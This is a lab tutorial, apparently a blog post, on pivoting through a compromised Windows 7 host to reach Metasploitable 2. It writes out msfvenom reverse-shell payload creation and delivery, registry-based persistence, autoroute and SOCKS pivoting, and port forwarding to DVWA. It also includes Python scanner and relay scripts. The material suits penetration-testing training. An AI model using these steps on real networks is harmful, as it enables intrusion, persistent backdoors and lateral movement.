PIVOTING & PORT FORWARDING
Pivoting is a technique for reaching internal machines on a network that we cannot access directly from the outside: we route our traffic through a machine we have already compromised. Metasploit has built-in support for it, and that is what this post uses.
In this post, I will be using 3 machines to demonstrate how this is done.
- Kali Linux (attacking machine): on the same subnet as Windows 7 only.
- Windows 7: on the same subnet as both Kali and Metasploitable 2 (it has an interface on each).
- Metasploitable 2: on the same subnet as Windows 7 only.
Basic networking tells us that two machines on the same subnet can talk to each other directly. Kali and Metasploitable 2 are on different subnets and nothing routes between those subnets, so they cannot communicate: Kali cannot directly scan or enumerate the Met2 machine.
If Met2 had a routable (for example public) IP that Kali could reach, we could simply attack that address directly, but in this lab everything is local and no such route exists.
How can one machine be on two different subnets at the same time?
Ans: Because that machine has two network adapters, each configured with an address on a different subnet.
So the Windows 7 machine has two adapters: one (10.60.32.157) on the 10.60.32.x network where Kali lives, and one (192.168.56.5) on the 192.168.56.0/24 network where Metasploitable 2 lives.
Let’s take a look at our Virtual Machines.
Below is the Kali Linux machine, with IP 10.60.32.82.
This is the Metasploitable 2 machine, with IP 192.168.56.7 (a different subnet from Kali's), which is why Kali cannot communicate with it directly.
And this is the Windows 7 machine with its two network adapters: 192.168.56.5, which talks to the Metasploitable 2 machine, and 10.60.32.157, which talks to the Kali machine.
Scenario:
You're an attacker in a black-box environment and your initial target is the Windows 7 machine. As usual you begin with a scan, hoping to find a vulnerable service on the target and an exploit for that vulnerability. You gain an initial foothold on the system, look for privilege escalation vectors and BAM! you've owned the system. Easy, right?
Now let’s try that.
Let's nmap the Windows 7 target:
sudo nmap -A -p- -T4 <windows7 ip>
As shown above, the Windows 7 machine gives us little to go on apart from the SSH service running on it. If we knew a password for that SSH service it would have been sweet, but we don't, so let's try another approach.
There are other ways to gain access to a Windows machine. Here I'm going with the payload method: build a malicious executable, get it onto the target, and catch the connection it makes back to us.
Let’s begin by creating our payload with msfvenom.
The syntax goes like this:
msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST=<local ip> LPORT=<local port> -o payload.exe
where LHOST is the IP of the attacker machine and LPORT is the port the attacker machine will listen on.
The payload has now been created as a Windows binary. Let's set up the listener, which will wait for the connection that payload.exe makes back to us the moment it is executed on the Windows 7 machine.
I will be using Metasploit's multi/handler to set up the listener. Launch Metasploit with:
msfconsole
Now select the multi handler as the listener:
use multi/handler
Set the payload type to the same one you used when creating payload.exe:
set payload windows/meterpreter/reverse_tcp
Check the options you have to set:
show options
Set the listening host to the attacker's IP:
set LHOST <Kali Linux ip>
Set LPORT to the port you specified when creating the payload:
set LPORT <payload port>
Now start the listener:
run
The attacker machine is now listening for the connection from our payload.exe.
Now let's find a way to get it onto the Windows 7 machine. What about hosting it on a web server and getting the Windows user to download it?
In the directory where the payload is, start a simple Python HTTP server to host payload.exe:
python -m SimpleHTTPServer
(that is the Python 2 module; on a current Kali the equivalent is python3 -m http.server). Either way the server listens on port 8000 on the attacker machine.
Now open a browser on the Windows 7 machine and enter in the address bar:
http://<attacker's ip>:8000/payload.exe
Save it; the downloaded payload.exe will be in the Downloads folder.
Run payload.exe on the Windows 7 machine.
Check the listener on the attacking machine: you'll see the connection come back to it.
Now you have a meterpreter shell. Background it with background (bg also works) and install persistence on the target, so that if our meterpreter session dies we can always spawn a new one.
Search for the persistence post-exploitation module:
search persistence
and use it:
use exploit/windows/local/persistence
Look at the options to set:
show options
Set SESSION to the ID of the session we backgrounded (1 here):
set session 1
Set LPORT to a port other than the one the handler is using. The module builds its own reverse_tcp payload from LHOST and LPORT, so you will need a second multi/handler listening on this port to catch the callback when the persistent script fires:
set LPORT 1234
Now run it to install the persistent VBScript on the target (it is dropped in the user's temp directory and launched from a registry Run key; the module also writes a cleanup resource script on Kali and prints its path, keep it for when the engagement ends):
run
Illustrated below:
After a successful run, you’ll see this:
Now interact with the session we backgrounded:
sessions -i 1
Drop from the meterpreter prompt to a cmd shell:
shell
Type ipconfig to list the network interfaces of the Windows 7 machine.
As you can see above, there are two interfaces: 10.60.32.157, which we already knew about, and 192.168.56.5, on a network we had no idea existed.
Type exit to return to meterpreter, then add that network range to Metasploit's routing table so that anything the framework sends to 192.168.56.0/24 goes through this session:
run autoroute -s 192.168.56.0/24
Check the routes you have added (you can add more) with:
run autoroute -p
(autoroute is the legacy meterpreter script; the same result comes from post/multi/manage/autoroute, or from route add 192.168.56.0/24 1 at the msf prompt, where 1 is the session ID.)
Now that the route is in place, let's scan that subnet for live hosts. One caveat: the route lives inside Metasploit, so it only applies to Metasploit modules. auxiliary/scanner/portscan/tcp with RHOSTS 192.168.56.0/24 goes through the pivot straight away, but nmap on Kali knows nothing about the session. To use nmap, expose the route as a SOCKS proxy with auxiliary/server/socks_proxy (listening on port 1080 by default) and run nmap through proxychains as a full connect scan with host discovery disabled, proxychains nmap -sT -Pn 192.168.56.0/24, since SYN scans and ICMP pings need raw sockets on the target network and cannot be proxied.
The scan shows another machine on that network (192.168.56.7) besides the Windows 7 box (192.168.56.5), and it has some juicy ports open.
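Because Metasploit's route table is invisible to outside tools, the usual way to scan through the pivot is to start auxiliary/server/socks_proxy on Kali and send plain TCP connects through it. The script below is an added example, not code from this post: a connect scanner that speaks SOCKS5 to that proxy (assumed at 127.0.0.1:1080, the module's default port, with VERSION 5) and reports each port as open, closed or filtered, which is the same thing proxychains nmap -sT -Pn does under the hood. It deliberately does only full connects, because a SYN scan needs raw sockets on the target's network and a pivot does not give you those. The target and port list in the main block are the post's values.

```python
"""Connect scan through a SOCKS5 pivot (for example Metasploit's
auxiliary/server/socks_proxy). Added example, not code from the post."""
import ipaddress
import socket
import struct
from typing import Dict, Iterable, Optional, Tuple

SOCKS_VER = 5


def socks5_connect_request(host: str, port: int) -> bytes:
    """Build a SOCKS5 CONNECT request (RFC 1928). IPv4 literals use ATYP=1;
    anything else is sent as a domain name (ATYP=3) so the proxy, which sits
    on the pivot side, does the name resolution (the socks5h behaviour)."""
    try:
        dst = b"\x01" + ipaddress.IPv4Address(host).packed
    except ipaddress.AddressValueError:
        name = host.encode()
        if len(name) > 255:
            raise ValueError("hostname too long for SOCKS5")
        dst = b"\x03" + bytes([len(name)]) + name
    return bytes([SOCKS_VER, 0x01, 0x00]) + dst + struct.pack("!H", port)


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("proxy closed the connection")
        buf += chunk
    return buf


def socks5_connect(proxy: Tuple[str, int], host: str, port: int,
                   timeout: float) -> socket.socket:
    """Open a TCP connection to host:port through a SOCKS5 proxy that accepts
    the 'no authentication' method. Raises on any failure."""
    s = socket.create_connection(proxy, timeout=timeout)
    try:
        s.sendall(bytes([SOCKS_VER, 0x01, 0x00]))        # offer NO AUTH only
        ver, method = _recv_exact(s, 2)
        if ver != SOCKS_VER or method != 0x00:
            raise ConnectionError("proxy rejected the no-auth method")
        s.sendall(socks5_connect_request(host, port))
        ver, rep, _rsv, atyp = _recv_exact(s, 4)
        if ver != SOCKS_VER or rep != 0x00:
            # the proxy reports refused and unreachable alike as a failure
            raise ConnectionRefusedError(f"SOCKS CONNECT failed, REP={rep:#x}")
        # drain BND.ADDR and BND.PORT, which we do not need
        if atyp == 0x01:
            _recv_exact(s, 4 + 2)
        elif atyp == 0x03:
            _recv_exact(s, _recv_exact(s, 1)[0] + 2)
        elif atyp == 0x04:
            _recv_exact(s, 16 + 2)
        return s
    except Exception:
        s.close()
        raise


def tcp_connect_scan(host: str, ports: Iterable[int],
                     proxy: Optional[Tuple[str, int]] = None,
                     timeout: float = 2.0) -> Dict[int, str]:
    """Full TCP connect scan, directly or via the proxy. Returns
    {port: 'open' | 'closed' | 'filtered'}. Through a pivot this is the only
    scan type available: SYN scans need raw sockets on the target's network."""
    results: Dict[int, str] = {}
    for port in ports:
        try:
            if proxy:
                s = socks5_connect(proxy, host, port, timeout)
            else:
                s = socket.create_connection((host, port), timeout=timeout)
            s.close()
            results[port] = "open"
        except socket.timeout:
            results[port] = "filtered"
        except OSError:                     # ConnectionRefusedError and friends
            results[port] = "closed"
    return results


if __name__ == "__main__":
    # Values from the post: Metasploitable 2 behind the Windows 7 pivot, reached
    # through Metasploit's SOCKS proxy on Kali (assumed default 127.0.0.1:1080).
    found = tcp_connect_scan("192.168.56.7",
                             [21, 22, 23, 25, 80, 139, 445, 3306, 5432, 8180],
                             proxy=("127.0.0.1", 1080))
    for port, state in sorted(found.items()):
        print(f"{port}/tcp {state}")
```

Ports that the proxy cannot reach come back as closed rather than filtered, because Metasploit's SOCKS server answers a failed CONNECT with a generic failure reply either way; only a proxy that does not answer at all within the timeout is reported as filtered. Hostnames are passed through to the proxy unresolved, so names that only resolve on the pivot's side of the network still work.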
PORT FORWARDING
Port forwarding lets us open a port on our local machine that maps to a service on a remote target we cannot reach directly; connections to the local port are relayed through the pivot to the target.
Met2 has an HTTP server running on port 80. Let's forward it to a local port (3232) on the attacker machine so that we can access it.
In the meterpreter shell, look at the help for the portfwd command:
portfwd -h
Following the syntax from the help, we forward the target's port 80 to local port 3232 on the attacker machine with:
portfwd add -l <local port> -p <remote port on target machine> -r <target ip>
NB: the target here is no longer the Windows 7 machine but the Metasploitable 2 machine (192.168.56.7). The forward is created inside the session on Windows 7, which is what makes that address reachable.
Now that the web server on the Met2 machine is forwarded to our local system, let's access it in a browser on the attacker machine at http://127.0.0.1:3232.
Metasploitable 2 ships with DVWA (under /dvwa/), which has a login portal. You can google the DVWA default credentials and try them there.
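What portfwd sets up is a small TCP relay: a listener on Kali whose connections are carried over the meterpreter session and re-opened from the Windows 7 host toward 192.168.56.7:80, where that address is reachable. The script below is an added example, not the post's code; it implements that relay in stdlib Python so the mechanism is visible. Its defaults are the post's values (local port 3232, remote 192.168.56.7:80). Run on a pivot host that has Python but no agent, it gives you the same forward; run on Kali it fails, because Kali has no route to 192.168.56.7, which is exactly why the relay has to live on the pivot.

```python
"""Minimal TCP port forward: every connection to LOCAL is relayed to REMOTE.
This is what `portfwd add -l 3232 -p 80 -r 192.168.56.7` does inside
meterpreter. Added example, not code from the post."""
import socket
import threading
from typing import Tuple

Addr = Tuple[str, int]


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes src -> dst until src hits EOF, then half-close dst so the
    other side sees the EOF too (HTTP/1.0 servers rely on this)."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _relay(client: socket.socket, remote_addr: Addr) -> None:
    """Open the onward connection for one accepted client and pump both ways."""
    try:
        remote = socket.create_connection(remote_addr, timeout=10)
    except OSError:
        client.close()          # target down or unreachable: drop the client
        return
    remote.settimeout(None)
    back = threading.Thread(target=_pump, args=(remote, client), daemon=True)
    back.start()
    _pump(client, remote)
    back.join()
    client.close()
    remote.close()


class PortForward:
    """Listener on local_addr; each accepted connection gets its own relay."""

    def __init__(self, local_addr: Addr, remote_addr: Addr) -> None:
        self.remote_addr = remote_addr
        self.listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.listener.bind(local_addr)
        self.listener.listen(16)
        self.local_port = self.listener.getsockname()[1]
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self) -> None:
        while True:
            try:
                client, _ = self.listener.accept()
            except OSError:     # listener closed by close()
                return
            threading.Thread(target=_relay, args=(client, self.remote_addr),
                             daemon=True).start()

    def close(self) -> None:
        self.listener.close()


def request_via(local_port: int, payload: bytes, timeout: float = 5.0) -> bytes:
    """Send payload to the forwarded port and return everything that comes
    back until EOF, e.g. an HTTP/1.0 request to see the remote server's reply."""
    with socket.create_connection(("127.0.0.1", local_port), timeout=timeout) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                return b"".join(chunks)
            chunks.append(data)


if __name__ == "__main__":
    # Post's values: expose Metasploitable 2's web server on local port 3232.
    fwd = PortForward(("127.0.0.1", 3232), ("192.168.56.7", 80))
    print(f"127.0.0.1:{fwd.local_port} -> 192.168.56.7:80, browse http://127.0.0.1:3232/")
    print(request_via(fwd.local_port, b"GET / HTTP/1.0\r\nHost: 192.168.56.7\r\n\r\n")[:200])
    threading.Event().wait()    # keep relaying until interrupted
```

The listener is bound to 127.0.0.1 on purpose: a forward bound to 0.0.0.0 would hand anyone who can reach the pivot a path into the internal service. The half-close in _pump is what makes HTTP/1.0 work through the relay, since the server only sends its response once it has seen the end of the request, and the browser only renders once it has seen the end of the response.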
If I made a mistake anywhere, you can send me a DM on Twitter @tinopreter or on LinkedIn @ClementOseiSomuah.